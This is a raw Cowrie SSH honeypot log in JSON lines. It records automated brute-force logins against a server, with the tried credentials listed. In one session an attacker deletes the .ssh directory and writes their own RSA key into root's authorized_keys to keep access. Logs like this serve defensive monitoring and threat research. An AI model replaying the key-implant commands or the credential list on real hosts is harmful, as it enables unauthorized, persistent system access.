{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":33466,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cfdd6905ca2","protocol":"ssh","message":"New connection: 199.195.248.191:33466 (1.2.3.4:22) [session: 7cfdd6905ca2]","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.087765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.099790Z","src_ip":"199.195.248.191","session":"7cfdd6905ca2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.185504Z","src_ip":"199.195.248.191","session":"7cfdd6905ca2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.548484Z","src_ip":"199.195.248.191","session":"7cfdd6905ca2"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.645940Z","src_ip":"199.195.248.191","session":"0d81e637c00d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.647066Z","src_ip":"199.195.248.191","session":"7cfdd6905ca2"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed6232578d94","protocol":"ssh","message":"New connection: 217.154.1.158:55398 (1.2.3.4:22) [session: ed6232578d94]","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.800902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.801934Z","src_ip":"217.154.1.158","session":"ed6232578d94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.816339Z","src_ip":"217.154.1.158","session":"ed6232578d94"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:35.876371Z","src_ip":"217.154.1.158","session":"ed6232578d94"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:36.903588Z","src_ip":"217.154.1.158","session":"ed6232578d94"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":26092,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d436b4ee85","protocol":"ssh","message":"New connection: 80.94.95.112:26092 (1.2.3.4:22) [session: 02d436b4ee85]","sensor":"my-vps","timestamp":"2025-08-26T19:48:52.625698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:48:52.626734Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:48:52.656914Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"optiplex","message":"login attempt [admin/optiplex] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:52.858777Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":58526,"dst_ip":"1.2.3.4","dst_port":22,"session":"452467bd27e6","protocol":"ssh","message":"New connection: 217.154.1.158:58526 (1.2.3.4:22) [session: 452467bd27e6]","sensor":"my-vps","timestamp":"2025-08-26T19:48:53.098001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:48:53.098770Z","src_ip":"217.154.1.158","session":"452467bd27e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:48:53.113342Z","src_ip":"217.154.1.158","session":"452467bd27e6"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:53.156146Z","src_ip":"217.154.1.158","session":"452467bd27e6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"opopop","message":"login attempt [admin/opopop] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:53.891729Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:54.171930Z","src_ip":"217.154.1.158","session":"452467bd27e6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"omerta","message":"login attempt [admin/omerta] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:54.924344Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"olives","message":"login attempt [admin/olives] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:55.956638Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nutella","message":"login attempt [admin/nutella] failed","sensor":"my-vps","timestamp":"2025-08-26T19:48:56.989165Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:48:58.021724Z","src_ip":"80.94.95.112","session":"02d436b4ee85"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46002,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7d3bb208bca","protocol":"ssh","message":"New connection: 217.154.1.158:46002 (1.2.3.4:22) [session: b7d3bb208bca]","sensor":"my-vps","timestamp":"2025-08-26T19:49:10.509967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:49:10.511165Z","src_ip":"217.154.1.158","session":"b7d3bb208bca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:49:10.525331Z","src_ip":"217.154.1.158","session":"b7d3bb208bca"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:49:10.579095Z","src_ip":"217.154.1.158","session":"b7d3bb208bca"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:11.594981Z","src_ip":"217.154.1.158","session":"b7d3bb208bca"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57336,"dst_ip":"1.2.3.4","dst_port":22,"session":"888702ba658a","protocol":"ssh","message":"New connection: 217.154.1.158:57336 (1.2.3.4:22) [session: 888702ba658a]","sensor":"my-vps","timestamp":"2025-08-26T19:49:27.987031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:49:27.993581Z","src_ip":"217.154.1.158","session":"888702ba658a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:49:28.001483Z","src_ip":"217.154.1.158","session":"888702ba658a"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T19:49:28.056986Z","src_ip":"217.154.1.158","session":"888702ba658a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:29.071986Z","src_ip":"217.154.1.158","session":"888702ba658a"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":58962,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c00a11d505","protocol":"ssh","message":"New connection: 199.195.248.191:58962 (1.2.3.4:22) [session: 31c00a11d505]","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.043509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.048833Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.140392Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.login.success","username":"root","password":"Wk123456.","message":"login attempt [root/Wk123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.507867Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:49:37.741455Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.742177Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.743406Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:37.844973Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:49:38.080236Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.080973Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.185940Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.186903Z","src_ip":"199.195.248.191","session":"31c00a11d505"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":59536,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee8b0972e75d","protocol":"ssh","message":"New connection: 199.195.248.191:59536 (1.2.3.4:22) [session: ee8b0972e75d]","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.272410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.275378Z","src_ip":"199.195.248.191","session":"ee8b0972e75d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.378226Z","src_ip":"199.195.248.191","session":"ee8b0972e75d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:49:38.750879Z","src_ip":"199.195.248.191","session":"ee8b0972e75d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:49:39.850986Z","src_ip":"199.195.248.191","session":"ee8b0972e75d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":60266,"dst_ip":"1.2.3.4","dst_port":22,"session":"639d028b00d9","protocol":"ssh","message":"New connection: 199.195.248.191:60266 (1.2.3.4:22) [session: 639d028b00d9]","sensor":"my-vps","timestamp":"2025-08-26T19:49:39.936711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:49:39.944683Z","src_ip":"199.195.248.191","session":"639d028b00d9"}
